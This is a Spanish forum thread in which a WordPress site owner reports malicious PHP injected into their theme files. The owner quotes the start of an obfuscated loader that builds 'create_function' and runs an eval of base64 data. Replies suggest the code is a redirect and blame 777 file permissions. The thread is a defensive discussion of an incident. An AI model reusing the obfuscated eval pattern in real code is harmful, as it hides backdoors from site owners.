Código malicioso en archivos PHP de theme WordPress

leobh Seguir

Gamma
Verificado por Whatsapp
Desde
29 Mar 2011
Mensajes
327
Hola.
Esta mañana hemos visto que en prácticamente todos los archivos php de nuestro theme nos habían incluido el siguiente código
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWT.......

Estamos reemplazando los archivos, cambiando passwords de la base de datos y demás....... algún consejo o alguna idea del daño que puede haber causado?

Un saludo y gracias!
 

Bruno

Pi
Domainer
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
20 Abr 2011
Mensajes
5.042
Siempre revisas el codigo php del theme? o paso algo para que lo revises?
 

juan25

No recomendado
Verificación en dos pasos activada
Desde
18 Ago 2010
Mensajes
4.675
Este tipo de codigos lo normal que hace es una redireccion de visitas... por tanto muchos de tus usuarios habran sido enviado a la url codificada emn base 64
 

leobh

Gamma
Verificado por Whatsapp
Desde
29 Mar 2011
Mensajes
327
Buenas,

Bruno ... no la verdad que no paso nada raro, fue al modificar el sidebar.php que vimos el código y ya repasamos todo, y habían sido modificados hace 2 días.

Juan25 ... Gracias! estamos revisando todos los archivos aunque subimos una copia de seguridad, a ver si no molesta mas

Saludos!
 

chilesep

Préstamo
Dseda
Desde
23 Ago 2012
Mensajes
1.021
Asegurate de ver bien los permisos de cada archivo ya que en worpress todavia no habia visto nouna vulnavirilidad para hacer injeciones asi que debe ser algun archivo que tienes con. Permiso 777 que permite sobreescribirlos
 

leobh

Gamma
Verificado por Whatsapp
Desde
29 Mar 2011
Mensajes
327
Asegurate de ver bien los permisos de cada archivo ya que en worpress todavia no habia visto nouna vulnavirilidad para hacer injeciones asi que debe ser algun archivo que tienes con. Permiso 777 que permite sobreescribirlos
Muchas gracias! Pues si, estaban todos con 777 extrañísimo, ya hemos puesto todos los archivos con 644 y carpetas 755
Saludos
 
Arriba